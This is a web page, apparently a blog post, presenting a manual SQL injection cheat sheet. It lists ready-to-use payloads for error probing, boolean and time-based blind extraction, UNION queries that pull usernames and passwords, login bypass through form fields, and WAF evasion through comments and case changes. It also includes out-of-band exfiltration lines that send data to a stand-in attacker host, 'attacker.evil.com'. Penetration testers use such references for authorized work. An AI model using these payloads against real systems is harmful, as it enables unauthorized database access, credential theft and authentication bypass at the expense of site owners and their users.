/ SQL, Uncategorized / By

SQL Injection Manual Cheat Sheet

Basic SQL Injection Payloads

'              
# Test for syntax error or break the query

' OR 1=1--      
# Always true condition, used to bypass filters or logic

' OR '1'='1'--  
# String-based version of a true condition

' AND 1=2--     
# Always false condition, useful for behavior comparison

Conditional Extraction (Boolean-Based Blind SQLi)

' AND 1=1--         
# True condition, page should load normally

' AND 1=2--         
# False condition, page should behave differently (e.g. blank/error)

' AND LENGTH(database())=8--     
# Tests if the length of the database name is 8

' AND SUBSTRING(database(),1,1)='a'--   
# Checks if the first character of the database name is 'a'

Time-Based Blind SQLi

' AND IF(1=1, SLEEP(5), 0)--    
# If condition is true, page response delays by 5 seconds (MySQL)

'; IF(1=1) WAITFOR DELAY '0:0:5'-- 
# Time delay for MSSQL when condition is true

UNION-Based SQL Injection

Finding Number of Columns

' ORDER BY 1--         
# Orders by column 1; use increasing numbers to detect the valid number of columns

' ORDER BY 2--         
# If this works, there are at least 2 columns

' ORDER BY 3--         
# Keep increasing until an error appears (that’s your limit)

Extracting Data via UNION

' UNION SELECT NULL, NULL--       
# Basic union test — match the number of columns

' UNION SELECT 1, database()--    
# Returns current database name (if reflected on the page)

' UNION SELECT 1, version()--     
# Returns DBMS version info

' UNION SELECT username, password FROM users-- 
# Attempts to extract data from the 'users' table

Login Bypass via SQLi

admin'--  
# Bypasses login if 'admin' exists, skips password check

admin' OR '1'='1'--  
# Universal login bypass

' OR 1=1 LIMIT 1-- 
# Selects the first row by always returning true

Information Schema Discovery

' AND (SELECT COUNT(*) FROM information_schema.tables)=10--  
# Tests how many tables exist

' AND (SELECT table_name FROM information_schema.tables LIMIT 1)='users'--  
# Checks if the first table is named 'users'

Extracting Data Blindly

' AND SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 0,1),1,1)='u'--  
# Checks if the first letter of the first table is 'u'

Out-of-Band SQLi Examples

'; EXEC xp_dirtree '\\attacker.evil.com\leak'--      
# Triggers DNS query to attacker-controlled domain (MSSQL)

'; SELECT load_file('\\\\attacker.evil.com\\x')--   
# MySQL loads a file which results in external DNS/HTTP call

Bypass & Obfuscation Tricks

'UNION/**/SELECT/**/NULL,NULL--  
# Bypasses basic WAFs using comments

'UnIoN sEleCt 1,2--  
# Case manipulation to evade filters

' OR 1=1#  
# Alternative comment style using hash

' OR 1=1/*  
# C-style comment ending

' OR 'a' + 'b' = 'ab'--  
# String concatenation in SQL, used for bypass or obfuscation

Login Bypass (POST Form Fields)

username=admin' -- 
# Ends query after username match

username=admin' OR 1=1-- 
# Bypasses authentication entirely

username=' OR 1=1-- 
# Similar technique, more generic

Final Advice

  • Test manually before using automation
  • Always identify the DBMS (MySQL, MSSQL, PostgreSQL, etc.)
  • Start with error detection, then escalate to extraction
  • Use tools like Burp Suite, ffuf, and sqlmap after confirming manual success

Related Posts

Scroll to Top